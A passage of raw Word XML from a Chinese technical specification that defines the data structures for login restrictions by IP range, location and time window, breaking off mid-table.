          <w:p w14:paraId="15A17A0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED45CD3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63FA0083" w14:textId="4BFCCAE7" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录时间，</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "logintimes数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>loginTimes数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F0DC39C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9D8CC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginLocations</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="002EB7CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B4D7FC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="072B9C09" w14:textId="3C00E153" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录区域，</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "loginlocations数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>loginLocations数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="137D0723" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E16164F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>combineType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="706297FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="116D7CBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3056F836" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1:所有条件均满足 2:任</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>一</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>条件满足</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19366818" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E87832F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>combineTypeAll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC08820" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48331C99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BDD05DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>条件组合方式 true：所有条件满足(默认)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="574429C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="284" w:name="loginips数据结构"/>
      <w:bookmarkEnd w:id="283"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginIps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="902"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1320"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="73850E3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D036E96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37B672A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D58EB0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="073E13AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DD77870" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52801DD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1804A4E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0536304C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>（1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AE77DF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP类型，1：普通IP/CIDR 2：IP段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5A4E40A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E34647C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AFFD65E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03CFAE97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5169938C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CADAD4A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0712CB2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7708E033" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A8DEB7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>25)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="218F9757" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP段起始</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2213231F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DDDAAB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endStr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BEA856B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0D4564" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>25)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B2C0045" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP段结束</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1D3A8501" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53371DC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="047D1F27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F20CAD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3811C836" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP段起始</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42C698DD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="690D327B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A567E96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23431B88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6083FE7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>IP段结束</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57E32A81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="logintimes数据结构"/>
      <w:bookmarkEnd w:id="284"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginTimes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1390"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="3925"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="31D168A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0E276FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AFBF033" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E3AAD05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C0C6025" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D162BE0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49A86FDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DD836AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AB61F9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47E73CD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始时间，如14：00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7583F4BD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="269DD817" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1077A82D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597B7434" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7025CF05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束时间，如18：20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="131F9E6D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6250F5A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startMinutes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56ED501A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6926CB03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10471C91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始时间，如840(例：14×60=840)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13194BC6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0D7478" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>endMinutes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0239F444" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="045C91EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E56CD92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>结束时间，如1100(例：18×60+20=1100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6ADE2D12" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7CAB4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C43735" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3386D9BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
